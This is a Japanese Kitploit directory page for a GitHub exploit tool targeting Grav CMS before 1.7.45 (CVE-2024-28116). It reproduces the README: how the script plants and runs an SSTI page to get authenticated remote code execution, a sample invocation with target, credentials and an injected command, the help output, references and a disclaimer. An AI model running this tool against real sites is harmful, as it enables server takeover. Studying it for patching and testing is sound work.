Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Grav-CMS-RCE-Authenticated — Grav CMS(バージョン1.7.45未満)に対するエクスプロイトで、認証済みユーザーにリモートコード実行を許可する - CVE-2024-28116 | Kitploit
ツール/GitHubGitHub/gunzf0x/grav-cms-rce-authenticated
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubgunzf0x/grav-cms-rce-authenticated

Grav-CMS-RCE-Authenticated

Grav CMS(バージョン1.7.45未満)に対するエクスプロイトで、認証済みユーザーにリモートコード実行を許可する - CVE-2024-28116

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Grav CMS リモートコード実行 (認証済み) - CVE-2024-28116

情報

このコードは、このビデオに基づいて改良を加えた、Graver Githubリポジトリからの翻案です。

Grav CMS(1.7.45未満のバージョン)に対するエクスプロイトで、SSTI + RCEの脆弱性(CVE-2024-28116として識別)に基づきます。このスクリプトは基本的に、脆弱性を含むページを作成し、実行し、最後に実行後にそのページを削除します。

使い方

root@kitploit:~
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'

ヘルプメッセージ:

root@kitploit:~
$ python3 Grav_CMS_RCE.py -h

usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]

Grav CMS RCE (Authenticated).

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL where Grav CMS is running. Example: http://10.10.10.10
  -P PORT, --port PORT  Port running Grav CMS. Default: 80
  -u USERNAME, --username USERNAME
                        Username to authenticate in Grav CMS
  -p PASSWORD, --password PASSWORD
                        Password for the user in Grav CMS.
  -x COMMAND, --command COMMAND
                        Command to inject/run.
  --no-delete-file      Do NOT delete the generated files. Useful to check command execution output.
  --panel-route PANEL_ROUTE
                        Admin Panel route in Grav CMS. Default: /admin
  --show-warnings       Show warnings (if there are).

何らかの理由で生成されたファイルを削除したくない場合は、--no-delete-fileフラグを使用して、スクリプトが示すページにアクセスし、コマンドの出力を読むことができます。

詳細情報

CVE-2024-28116 / このエクスプロイトに関する詳細情報:

  • Grav CMS v1.7.44 - Admin 1.10.44でテスト済み。
  • https://github.com/akabe1/Graver
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28116
  • https://ethicalhacking.uk/videos/CVE-2024-28116/#gsc.tab=0
  • https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh

免責事項

このリポジトリの所有者は、本ソフトウェアの使用について一切の責任を負いません。本ソフトウェアは教育目的のみで作成されました。

ライセンス

  • MIT
ツールをダウンロード